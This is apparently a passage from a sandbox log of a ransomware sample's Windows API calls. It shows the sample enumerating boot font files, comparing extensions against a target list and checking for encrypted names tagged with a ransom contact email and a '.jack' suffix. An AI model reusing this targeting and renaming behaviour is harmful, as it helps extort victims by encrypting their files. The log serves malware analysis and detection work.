hTemplateFile=0x0) returned 0x438 [0205.347] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=143754) returned 1 [0205.347] CloseHandle (hObject=0x438) returned 1 [0205.347] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf")) returned 0x20 [0205.347] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.347] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.347] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0205.347] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0205.347] lstrlenW (lpString=".doc") returned 4 [0205.347] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0205.347] lstrlenW (lpString=".docx") returned 5 [0205.347] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0205.347] lstrlenW (lpString=".pdf") returned 4 [0205.347] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0205.347] lstrlenW (lpString=".xls") returned 4 [0205.347] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0205.347] lstrlenW (lpString=".xlsx") returned 5 [0205.347] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0205.347] lstrlenW (lpString=".ppt") returned 4 [0205.348] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0205.348] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0205.348] lstrlenW (lpString=".zip") returned 4 [0205.348] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0205.348] lstrlenW (lpString=".rar") returned 4 [0205.348] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0205.348] lstrlenW (lpString=".bz2") returned 4 [0205.348] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0205.348] lstrlenW (lpString=".7z") returned 3 [0205.348] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0205.348] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0205.348] lstrlenW (lpString=".dbf") returned 4 [0205.348] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0205.348] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0205.348] lstrlenW (lpString=".1cd") returned 4 [0205.348] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0205.348] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0205.348] lstrlenW (lpString=".jpg") returned 4 [0205.348] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0205.348] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0205.348] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0205.348] lstrlenW (lpString=".doc") returned 4 [0205.348] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0205.348] lstrlenW (lpString=".docx") returned 5 [0205.348] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0205.348] lstrlenW (lpString=".pdf") returned 4 [0205.348] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0205.348] lstrlenW (lpString=".xls") returned 4 [0205.349] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0205.349] lstrlenW (lpString=".xlsx") returned 5 [0205.349] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0205.349] lstrlenW (lpString=".ppt") returned 4 [0205.349] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0205.349] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0205.349] lstrlenW (lpString=".zip") returned 4 [0205.349] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0205.349] lstrlenW (lpString=".rar") returned 4 [0205.349] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0205.349] lstrlenW (lpString=".bz2") returned 4 [0205.349] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0205.349] lstrlenW (lpString=".7z") returned 3 [0205.349] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0205.349] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0205.349] lstrlenW (lpString=".dbf") returned 4 [0205.349] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0205.349] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0205.349] lstrlenW (lpString=".1cd") returned 4 [0205.349] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0205.349] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 30 [0205.349] lstrlenW (lpString=".jpg") returned 4 [0205.349] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0205.349] lstrcmpiW (lpString1=".ttf", lpString2=".jack") returned 1 [0205.349] lstrlenW (lpString="meiryo_boot.ttf") returned 15 [0205.350] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0205.351] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=145419) returned 1 [0205.351] CloseHandle (hObject=0x438) returned 1 [0205.351] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf")) returned 0x20 [0205.351] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.351] CreateFileW (lpFileName="C:\\Boot\\Fonts\\meiryo_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryo_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.352] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 29 [0205.352] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 29 [0205.352] lstrlenW (lpString=".doc") returned 4 [0205.352] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0205.352] lstrlenW (lpString=".docx") returned 5 [0205.352] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0205.352] lstrlenW (lpString=".pdf") returned 4 [0205.352] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0205.352] lstrlenW (lpString=".xls") returned 4 [0205.352] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0205.352] lstrlenW (lpString=".xlsx") returned 5 [0205.352] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0205.352] lstrlenW (lpString=".ppt") returned 4 [0205.352] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0205.352] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 29 [0205.352] lstrlenW (lpString=".zip") returned 4 [0205.352] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0205.352] lstrlenW (lpString=".rar") returned 4 [0205.352] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0205.352] lstrlenW (lpString=".bz2") returned 4 [0205.352] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0205.352] lstrlenW (lpString=".7z") returned 3 [0205.352] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0205.352] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 29 [0205.352] lstrlenW (lpString=".dbf") returned 4 [0205.352] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0205.352] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 29 [0205.352] lstrlenW (lpString=".1cd") returned 4 [0205.352] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0205.353] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 29 [0205.353] lstrlenW (lpString=".jpg") returned 4 [0205.353] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0205.353] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 29 [0205.353] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 29 [0205.353] lstrlenW (lpString=".doc") returned 4 [0205.353] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0205.353] lstrlenW (lpString=".docx") returned 5 [0205.353] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0205.353] lstrlenW (lpString=".pdf") returned 4 [0205.353] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0205.353] lstrlenW (lpString=".xls") returned 4 [0205.353] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0205.353] lstrlenW (lpString=".xlsx") returned 5 [0205.353] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0205.353] lstrlenW (lpString=".ppt") returned 4 [0205.353] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0205.353] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 29 [0205.353] lstrlenW (lpString=".zip") returned 4 [0205.353] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0205.353] lstrlenW (lpString=".rar") returned 4 [0205.353] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0205.353] lstrlenW (lpString=".bz2") returned 4 [0205.353] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0205.353] lstrlenW (lpString=".7z") returned 3 [0205.353] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0205.353] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 29 [0205.353] lstrlenW (lpString=".dbf") returned 4 [0205.353] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0205.354] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 29 [0205.354] lstrlenW (lpString=".1cd") returned 4 [0205.354] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0205.354] lstrlenW (lpString="C:\\Boot\\Fonts\\meiryo_boot.ttf") returned 29 [0205.354] lstrlenW (lpString=".jpg") returned 4 [0205.354] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0205.354] lstrcmpiW (lpString1=".ttf", lpString2=".jack") returned 1 [0205.354] lstrlenW (lpString="msjhn_boot.ttf") returned 14 [0205.354] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0205.354] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=162331) returned 1 [0205.354] CloseHandle (hObject=0x438) returned 1 [0205.354] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf")) returned 0x20 [0205.355] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\msjhn_boot.ttf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.355] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msjhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.355] lstrlenW (lpString="C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 28 [0205.355] lstrlenW (lpString="C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 28 [0205.355] lstrlenW (lpString=".doc") returned 4 [0205.355] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0205.355] lstrlenW (lpString=".docx") returned 5 [0205.355] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0205.355] lstrlenW (lpString=".pdf") returned 4 [0205.355] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0205.355] lstrlenW (lpString=".xls") returned 4 [0205.355] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0205.355] lstrlenW (lpString=".xlsx") returned 5 [0205.355] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0205.355] lstrlenW (lpString=".ppt") returned 4 [0205.355] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0205.355] lstrlenW (lpString="C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 28 [0205.355] lstrlenW (lpString=".zip") returned 4 [0205.355] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0205.355] lstrlenW (lpString=".rar") returned 4 [0205.355] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0205.355] lstrlenW (lpString=".bz2") returned 4 [0205.355] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0205.355] lstrlenW (lpString=".7z") returned 3 [0205.355] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0205.355] lstrlenW (lpString="C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 28 [0205.356] lstrlenW (lpString=".dbf") returned 4 [0205.356] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0205.356] lstrlenW (lpString="C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 28 [0205.356] lstrlenW (lpString=".1cd") returned 4 [0205.356] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0205.356] lstrlenW (lpString="C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 28 [0205.356] lstrlenW (lpString=".jpg") returned 4 [0205.356] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0205.356] lstrlenW (lpString="C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 28 [0205.356] lstrlenW (lpString="C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 28 [0205.356] lstrlenW (lpString=".doc") returned 4 [0205.356] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0205.356] lstrlenW (lpString=".docx") returned 5 [0205.356] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0205.356] lstrlenW (lpString=".pdf") returned 4 [0205.356] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0205.356] lstrlenW (lpString=".xls") returned 4 [0205.356] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0205.356] lstrlenW (lpString=".xlsx") returned 5 [0205.356] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0205.356] lstrlenW (lpString=".ppt") returned 4 [0205.356] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0205.356] lstrlenW (lpString="C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 28 [0205.356] lstrlenW (lpString=".zip") returned 4 [0205.356] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0205.356] lstrlenW (lpString=".rar") returned 4 [0205.356] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0205.356] lstrlenW (lpString=".bz2") returned 4 [0205.357] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0205.357] lstrlenW (lpString=".7z") returned 3 [0205.357] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0205.357] lstrlenW (lpString="C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 28 [0205.357] lstrlenW (lpString=".dbf") returned 4 [0205.357] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0205.357] lstrlenW (lpString="C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 28 [0205.357] lstrlenW (lpString=".1cd") returned 4 [0205.357] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0205.357] lstrlenW (lpString="C:\\Boot\\Fonts\\msjhn_boot.ttf") returned 28 [0205.357] lstrlenW (lpString=".jpg") returned 4 [0205.357] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0205.357] lstrcmpiW (lpString1=".ttf", lpString2=".jack") returned 1 [0205.357] lstrlenW (lpString="msjh_boot.ttf") returned 13 [0205.357] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0205.358] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=164347) returned 1 [0205.358] CloseHandle (hObject=0x438) returned 1 [0205.358] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf")) returned 0x20 [0205.359] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\msjh_boot.ttf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.359] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.359] lstrlenW (lpString="C:\\Boot\\Fonts\\msjh_boot.ttf") returned 27 [0205.359] lstrlenW (lpString="C:\\Boot\\Fonts\\msjh_boot.ttf") returned 27 [0205.359] lstrlenW (lpString=".doc") returned 4 [0205.359] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0205.359] lstrlenW (lpString=".docx") returned 5 [0205.359] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0205.359] lstrlenW (lpString=".pdf") returned 4 [0205.359] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0205.359] lstrlenW (lpString=".xls") returned 4 [0205.359] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0205.359] lstrlenW (lpString=".xlsx") returned 5 [0205.359] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0205.359] lstrlenW (lpString=".ppt") returned 4 [0205.359] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0205.359] lstrlenW (lpString="C:\\Boot\\Fonts\\msjh_boot.ttf") returned 27 [0205.359] lstrlenW (lpString=".zip") returned 4 [0205.359] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0205.359] lstrlenW (lpString=".rar") returned 4 [0205.359] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0205.359] lstrlenW (lpString=".bz2") returned 4 [0205.359] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0205.359] lstrlenW (lpString=".7z") returned 3 [0205.359] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0205.359] lstrlenW (lpString="C:\\Boot\\Fonts\\msjh_boot.ttf") returned 27 [0205.360] lstrlenW (lpString=".dbf") returned 4 [0205.360] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0205.360] lstrlenW (lpString="C:\\Boot\\Fonts\\msjh_boot.ttf") returned 27 [0205.360] lstrlenW (lpString=".1cd") returned 4 [0205.360] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0205.360] lstrlenW (lpString="C:\\Boot\\Fonts\\msjh_boot.ttf") returned 27 [0205.360] lstrlenW (lpString=".jpg") returned 4 [0205.360] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0205.360] lstrlenW (lpString="C:\\Boot\\Fonts\\msjh_boot.ttf") returned 27 [0205.360] lstrlenW (lpString="C:\\Boot\\Fonts\\msjh_boot.ttf") returned 27 [0205.360] lstrlenW (lpString=".doc") returned 4 [0205.360] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0205.360] lstrlenW (lpString=".docx") returned 5 [0205.360] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0205.360] lstrlenW (lpString=".pdf") returned 4 [0205.360] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0205.360] lstrlenW (lpString=".xls") returned 4 [0205.360] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0205.360] lstrlenW (lpString=".xlsx") returned 5 [0205.360] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0205.360] lstrlenW (lpString=".ppt") returned 4 [0205.360] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0205.360] lstrlenW (lpString="C:\\Boot\\Fonts\\msjh_boot.ttf") returned 27 [0205.360] lstrlenW (lpString=".zip") returned 4 [0205.360] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0205.360] lstrlenW (lpString=".rar") returned 4 [0205.360] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0205.360] lstrlenW (lpString=".bz2") returned 4 [0205.361] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0205.361] lstrlenW (lpString=".7z") returned 3 [0205.361] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0205.361] lstrlenW (lpString="C:\\Boot\\Fonts\\msjh_boot.ttf") returned 27 [0205.361] lstrlenW (lpString=".dbf") returned 4 [0205.361] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0205.361] lstrlenW (lpString="C:\\Boot\\Fonts\\msjh_boot.ttf") returned 27 [0205.361] lstrlenW (lpString=".1cd") returned 4 [0205.361] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0205.361] lstrlenW (lpString="C:\\Boot\\Fonts\\msjh_boot.ttf") returned 27 [0205.361] lstrlenW (lpString=".jpg") returned 4 [0205.361] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0205.361] lstrcmpiW (lpString1=".ttf", lpString2=".jack") returned 1 [0205.361] lstrlenW (lpString="msyhn_boot.ttf") returned 14 [0205.361] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0205.361] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=154427) returned 1 [0205.362] CloseHandle (hObject=0x438) returned 1 [0205.362] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf")) returned 0x20 [0205.362] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\msyhn_boot.ttf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.362] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0205.362] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0205.362] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0205.362] lstrlenW (lpString=".doc") returned 4 [0205.362] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0205.362] lstrlenW (lpString=".docx") returned 5 [0205.362] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0205.362] lstrlenW (lpString=".pdf") returned 4 [0205.362] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0205.362] lstrlenW (lpString=".xls") returned 4 [0205.362] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0205.362] lstrlenW (lpString=".xlsx") returned 5 [0205.363] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0205.363] lstrlenW (lpString=".ppt") returned 4 [0205.363] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0205.363] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0205.363] lstrlenW (lpString=".zip") returned 4 [0205.363] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0205.363] lstrlenW (lpString=".rar") returned 4 [0205.363] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0205.363] lstrlenW (lpString=".bz2") returned 4 [0205.363] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0205.363] lstrlenW (lpString=".7z") returned 3 [0205.363] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0205.363] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0205.363] lstrlenW (lpString=".dbf") returned 4 [0205.363] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0205.363] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0205.363] lstrlenW (lpString=".1cd") returned 4 [0205.363] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0205.363] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0205.363] lstrlenW (lpString=".jpg") returned 4 [0205.363] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0205.363] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0205.363] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0205.363] lstrlenW (lpString=".doc") returned 4 [0205.363] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0205.363] lstrlenW (lpString=".docx") returned 5 [0205.363] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0205.363] lstrlenW (lpString=".pdf") returned 4 [0205.364] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0205.364] lstrlenW (lpString=".xls") returned 4 [0205.364] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0205.364] lstrlenW (lpString=".xlsx") returned 5 [0205.364] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0205.364] lstrlenW (lpString=".ppt") returned 4 [0205.364] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0205.364] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0205.364] lstrlenW (lpString=".zip") returned 4 [0205.364] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0205.364] lstrlenW (lpString=".rar") returned 4 [0205.364] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0205.364] lstrlenW (lpString=".bz2") returned 4 [0205.364] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0205.364] lstrlenW (lpString=".7z") returned 3 [0205.364] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0205.364] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0205.364] lstrlenW (lpString=".dbf") returned 4 [0205.364] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0205.364] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0205.364] lstrlenW (lpString=".1cd") returned 4 [0205.364] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0205.364] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0205.364] lstrlenW (lpString=".jpg") returned 4 [0205.364] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0205.364] lstrcmpiW 